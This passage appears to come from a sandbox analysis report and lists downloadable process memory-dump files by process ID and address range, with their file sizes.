Filesize
11.4MB

Download
memory/564-71-0x0000000000000000-mapping.dmp

Download
memory/628-113-0x0000000000000000-mapping.dmp

Download
memory/652-82-0x0000000000000000-mapping.dmp

Download
memory/652-127-0x0000000000000000-mapping.dmp

Download
memory/728-95-0x0000000000000000-mapping.dmp

Download
memory/788-99-0x0000000000000000-mapping.dmp

Download
memory/804-76-0x0000000000000000-mapping.dmp

Download
memory/848-110-0x000000000256B000-0x000000000258A000-memory.dmp

Filesize
124KB

Download
memory/848-101-0x0000000000000000-mapping.dmp

Download
memory/848-107-0x0000000002564000-0x0000000002567000-memory.dmp

Filesize
12KB

Download
memory/848-106-0x000007FEF3530000-0x000007FEF408D000-memory.dmp

Filesize
11.4MB

Download
memory/848-105-0x000007FEF4090000-0x000007FEF4AB3000-memory.dmp

Filesize
10.1MB

Download
memory/848-108-0x000000001B7B0000-0x000000001BAAF000-memory.dmp

Filesize
3.0MB

Download
memory/848-109-0x0000000002564000-0x0000000002567000-memory.dmp

Filesize
12KB

Download
memory/876-83-0x0000000002994000-0x0000000002997000-memory.dmp

Filesize
12KB

Download
memory/876-74-0x000007FEF3530000-0x000007FEF408D000-memory.dmp

Filesize
11.4MB

Download
memory/876-67-0x0000000000000000-mapping.dmp

Download
memory/876-86-0x000000000299B000-0x00000000029BA000-memory.dmp

Filesize
124KB

Download
memory/876-72-0x000007FEF4090000-0x000007FEF4AB3000-memory.dmp

Filesize
10.1MB

Download
memory/876-135-0x0000000000000000-mapping.dmp

Download
memory/876-77-0x000000001B900000-0x000000001BBFF000-memory.dmp

Filesize
3.0MB

Download
memory/876-85-0x0000000002994000-0x0000000002997000-memory.dmp

Filesize
12KB

Download
memory/992-111-0x0000000000000000-mapping.dmp

Download
memory/1036-126-0x0000000000000000-mapping.dmp

Download
memory/1044-59-0x0000000000000000-mapping.dmp

Download
memory/1044-65-0x000000000266B000-0x000000000268A000-memory.dmp

Filesize
124KB

Download
memory/1044-64-0x0000000002664000-0x0000000002667000-memory.dmp

Filesize
12KB

Download
memory/1044-62-0x000007FEF2B90000-0x000007FEF36ED000-memory.dmp

Filesize
11.4MB

Download
memory/1044-63-0x0000000002664000-0x0000000002667000-memory.dmp

Filesize
12KB

Download
memory/1044-61-0x000007FEF36F0000-0x000007FEF4113000-memory.dmp

Filesize
10.1MB

Download
memory/1044-60-0x000007FEFBAE1000-0x000007FEFBAE3000-memory.dmp

Filesize
8KB

Download
memory/1184-128-0x0000000000000000-mapping.dmp

Download
memory/1236-55-0x0000000074F41000-0x0000000074F43000-memory.dmp

Filesize
8KB

Download
memory/1236-54-0x0000000000000000-mapping.dmp

Download
memory/1244-84-0x0000000000000000-mapping.dmp

Download
memory/1256-139-0x0000000000000000-0x0000000001000000-memory.dmp

Filesize
16.0MB

Download
memory/1256-137-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/1256-136-0x00000001407F25D0-mapping.dmp

Download
memory/1256-138-0x0000000000070000-0x0000000000090000-memory.dmp

Filesize
128KB

Download
memory/1256-142-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/1324-134-0x0000000000000000-mapping.dmp

Download
memory/1480-132-0x00000001400014E0-mapping.dmp

Download
memory/1500-69-0x0000000000000000-mapping.dmp

Download
memory/1656-129-0x0000000000000000-mapping.dmp

Download
memory/1724-118-0x0000000000000000-mapping.dmp

Download
memory/1724-73-0x0000000000000000-mapping.dmp

Download
memory/1732-78-0x0000000000000000-mapping.dmp

Download
memory/1732-124-0x0000000000000000-mapping.dmp

Download
memory/1736-123-0x0000000000000000-mapping.dmp

Download
memory/1744-66-0x0000000000000000-mapping.dmp

Download
memory/1784-79-0x0000000000000000-mapping.dmp

Download
memory/1800-57-0x0000000000000000-mapping.dmp

Download
memory/1816-125-0x0000000000000000-mapping.dmp

Download
memory/1816-81-0x0000000000000000-mapping.dmp

Download
memory/1840-121-0x0000000000000000-mapping.dmp

Download
memory/1864-122-0x0000000000000000-mapping.dmp

Download
memory/1932-75-0x0000000000000000-mapping.dmp

Download
memory/2044-133-0x0000000000000000-mapping.dmp

Download